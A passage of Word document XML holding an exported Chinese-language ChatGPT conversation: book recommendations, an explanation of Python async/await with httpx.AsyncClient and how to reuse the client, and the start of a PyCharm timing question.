      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lawrence Block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一部关于职业杀手的系列小说，描述他如何在每个任务中不断挑战自己的道德底线，同时还要面临各种生存的威胁。剧情丰富且角色设定独特。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638599B8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17671372" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《哈利·波特》系列（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J.K. Rowling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你喜欢魔法和冒险的故事，那么哈利·波特系列是必读的。尽管这是一部儿童文学，但其复杂的剧情和人性深度的描绘使得许多成年读者也为之着迷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6861A998" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B41A5E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上这些书的剧情设计精巧，人物塑造丰满，如果你喜欢美剧的话，相信会喜欢这些书。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69643C12" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45617A05" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我不懂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async def make_request(url_str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792F8D8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6146F0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url_str, json=data, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB6889" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(response.text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法，告诉我你对他详细的解读。我不太懂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641639A4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE3BBE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E36C8D6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码是使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> async/await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库（一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端库）来创建一个异步的网络请求。这是一种非阻塞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，这意味着你的程序不会在等待网络请求的响应时停止执行其他代码。让我们逐行解析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C360ED" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706A6439" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    async def make_request(url_str): - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是定义一个异步函数的语法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字表示这个函数是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一种特殊类型的函数，它可以在执行过程中被挂起，执行其他任务，然后在适当的时候恢复执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93CFC6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D96BC85" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client: - async with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是异步上下文管理器，它的作用类似于常规的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，但它是用于异步操作的。这里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了一个异步的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAE8C5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0550BF16" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    response = await client.post(url=url_str, json=data, headers=headers) - await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字是用于在协程中挂起函数的执行，直到等待的操作完成。在这里，它挂起了函数的执行，直到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求完成并返回响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF69AA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B455ADA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(response.text) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这行代码打印了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应的文本部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB2A98" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5DFB68" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">async/await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法提供了一种在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中进行异步编程的方式，它允许你编写出非阻塞的代码，这对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型操作（如网络请求）非常有用，因为在等待响应时，你的程序可以继续执行其他任务。这样就提高了程序的并发性能，尤其是在处理大量网络请求或其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作的时候。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982BE18" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C35531" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能不能被重复使用，我给他提供不同的请求参数，他给我返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA814AA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D8BC2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70576EAF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例可以被重复使用。你可以使用同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送多个请求。每次请求时，你都可以提供不同的请求参数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、数据、头部信息等）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会根据提供的参数执行请求，并返回相应的响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E2E47" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8239A1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个例子，展示如何使用同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送多个请求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E9952E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470CC852" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506DDDFC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9F17A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1A280" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3923BF6C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def fetch_data(client, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73718B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    response = await client.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D7BD23" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FA0D0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44490EC6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C89925" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient() as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A80AC4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await fetch_data(client, 'http://example.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1D161" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await fetch_data(client, 'http://anotherexample.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA375B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EA4B9D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1563B0A9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7D0927" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetch_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，该函数接受一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例和一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为参数，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求到提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并打印响应内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D4FB21" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB2F249" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中，我们创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例，并用它来执行两次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetch_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，每次都提供了不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805B76E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5AD9CB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是如何使用同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送多个请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E620AA0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E79B6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何让程序运行或者调试的时候输出运行时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D00FF0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66003557" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
